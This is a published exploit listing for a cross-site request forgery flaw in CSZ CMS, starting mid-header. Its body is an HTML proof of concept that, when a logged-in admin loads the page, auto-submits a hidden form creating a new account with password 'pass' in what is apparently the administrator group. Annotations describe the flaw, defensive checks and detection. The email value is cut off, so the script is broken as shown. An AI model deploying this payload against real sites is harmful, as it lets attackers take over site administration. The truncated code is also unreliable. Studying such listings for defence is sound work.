Admin)
# Date: 2024-05-03
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.cszcms.com
# Software Link: https://www.cszcms.com/link/3#https://sourceforge.net/projects/cszcms/files/latest/download
# Version: latest
# Tested on: MacOS
##################################### CSRF PoC
#####################################
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>CSRF PoC</title>
</head>
<body>
<script>
// Proof-of-concept script for the CSRF issue this page reports: on page load it
// builds a form aimed at the admin "add user" URL and submits it straight away,
// with no user interaction.
// The request can only take effect if the browser attaches an authenticated admin
// session to this cross-site POST and the server accepts it without a per-request
// anti-CSRF token -- presumably the reported flaw; confirm against the affected version.
// Defensive checks for this route: a CSRF token validated server-side, SameSite
// session cookies, and Origin/Referer validation on state-changing requests.
// Detection: review account-creation events whose request Origin/Referer is not
// the site itself.
// Create a hidden form
var form = document.createElement("form");
form.setAttribute("method", "POST");
// TARGETSITE is a placeholder for the host; the path is the one the PoC posts to.
form.setAttribute("action", "http://TARGETSITE/admin/users/new/add");
form.setAttribute("target", "_blank"); // Open in a new tab
// Add form fields
// Each key below becomes the name of a hidden input and each value its value.
// NOTE(review): group "1" is presumably the administrator group, going by the
// advisory title -- confirm against the CMS's group table.
// NOTE(review): the email value is cut off in this copy of the listing (the string
// is never closed), so the script does not parse as shown.
var fields = {
name: "admin",
email: "
password: "pass",
con_password: "pass",
group: "1",
pass_change: "yes",
active: 1
// Add other fields as needed
};
// Append fields to the form
for (var key in fields) {
if (fields.hasOwnProperty(key)) {
var input = document.createElement("input");
input.setAttribute("type", "hidden");
input.setAttribute("name", key);
input.setAttribute("value", fields[key]);
form.appendChild(input);
}
}
// Add the form to the page
document.body.appendChild(form);
// Submit the form
form.submit();
</script>
</body>
</html>
##################################### CSRF PoC Ended
#####################################